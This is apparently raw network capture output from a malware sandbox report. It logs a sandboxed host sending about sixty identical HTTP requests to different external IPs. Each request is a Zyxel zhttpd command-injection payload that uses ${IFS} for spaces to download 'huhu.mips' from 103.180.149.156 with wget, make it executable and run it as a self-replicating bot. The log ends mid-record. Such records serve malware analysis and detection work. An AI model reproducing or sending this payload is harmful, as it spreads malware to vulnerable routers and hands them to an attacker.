                                                        Feb 2, 2024 06:20:59.723270893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1901192.168.2.144035051.134.59.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723308086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1902192.168.2.1455204156.165.37.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723352909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1903192.168.2.14495789.106.227.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723397970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1904192.168.2.1441912163.102.25.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723445892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1905192.168.2.1451372201.97.167.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723480940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1906192.168.2.1447716185.211.116.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723536015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1907192.168.2.1453296111.42.217.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723561049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1908192.168.2.1446788105.241.158.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723612070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1909192.168.2.1444474101.77.187.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723649025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1910192.168.2.1452598113.228.235.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723706961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1911192.168.2.1453828168.76.203.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723740101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1912192.168.2.1456150102.111.165.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723786116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1913192.168.2.144783696.56.147.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723817110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1914192.168.2.144627423.148.86.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723880053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1915192.168.2.1449982191.252.192.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723912001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1916192.168.2.145392493.248.120.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723961115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1917192.168.2.143553825.202.24.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723998070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1918192.168.2.145277046.3.219.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724035978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1919192.168.2.145808863.36.156.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724056005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1920192.168.2.143800454.248.182.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724107027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1921192.168.2.1440642108.179.17.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724137068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1922192.168.2.1435208178.72.160.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724169970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1923192.168.2.144256085.126.156.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724201918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1924192.168.2.1457592182.95.70.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724246979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1925192.168.2.1460462190.26.225.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724266052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1926192.168.2.1452442219.79.2.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724320889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1927192.168.2.143350832.13.33.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724365950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1928192.168.2.1448070180.86.212.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724411964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1929192.168.2.1433242161.201.191.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724447012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1930192.168.2.1438336116.224.44.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724478006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1931192.168.2.143468649.91.115.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724522114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1932192.168.2.1439326122.139.246.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724558115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1933192.168.2.14414061.247.26.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724601984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1934192.168.2.143477879.26.128.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724658012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1935192.168.2.1449484200.57.22.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724693060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1936192.168.2.1435384185.224.26.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724708080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1937192.168.2.1439738175.15.28.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724754095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1938192.168.2.1455850164.150.253.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724773884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1939192.168.2.1450554104.13.198.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724818945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1940192.168.2.1446384122.47.152.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724850893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1941192.168.2.143853289.134.215.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724901915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1942192.168.2.1442652220.77.221.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724945068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1943192.168.2.1450556146.84.232.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.724976063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1944192.168.2.144719067.168.10.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725003958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1945192.168.2.145815437.200.53.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725043058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1946192.168.2.1457718109.183.217.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725073099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1947192.168.2.144188653.238.18.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725111008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1948192.168.2.1441698164.60.100.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725128889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1949192.168.2.14498225.121.196.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725187063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1950192.168.2.1457172153.183.152.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725213051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1951192.168.2.1441184203.192.170.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725259066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1952192.168.2.1448756154.15.18.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725301981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1953192.168.2.1437912205.79.238.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725347042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1954192.168.2.1449732157.76.21.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725383997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1955192.168.2.1436636133.34.0.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725410938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1956192.168.2.1438036111.1.27.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725449085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1957192.168.2.143701048.111.247.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725506067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1958192.168.2.14541509.98.92.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725544930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1959192.168.2.145465825.232.26.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725579977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1960192.168.2.143511485.56.4.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725626945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1961192.168.2.1442792112.131.20.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725653887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1962192.168.2.1436992106.98.146.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725703955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1963192.168.2.1445148189.25.225.91443
                                                        TimestampBytes transferredDirectionData
